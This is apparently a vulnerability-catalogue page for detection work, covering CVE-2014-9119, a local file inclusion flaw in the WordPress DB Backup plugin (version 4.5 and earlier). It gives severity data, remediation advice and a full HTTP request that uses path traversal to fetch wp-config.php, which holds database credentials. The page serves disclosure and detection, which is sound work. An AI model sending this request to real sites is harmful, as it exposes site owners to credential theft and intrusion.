🔙 목록으로 돌아가기

CVE-2014-9119: WordPress DB Backup <=4.5 - Local File Inclusion

TitleWordPress DB Backup <=4.5 - Local File Inclusion
AuthordhiyaneshDK
SeverityMedium
ImpactAllows an attacker to read arbitrary files on the server.
RemediationUpdate WordPress DB Backup plugin to version 4.6 or higher.
CVSS Score5
EPSS Score0.3807
CVE IDCVE-2014-9119
CWE IDCWE-22
Tags cve2014 cve lfi wordpress wp-plugin wp backup wpscan edb db_backup_project vuln

🔍 Vulnerability Description

WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

🌐 HTTP Request

GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-9119.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-9119.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A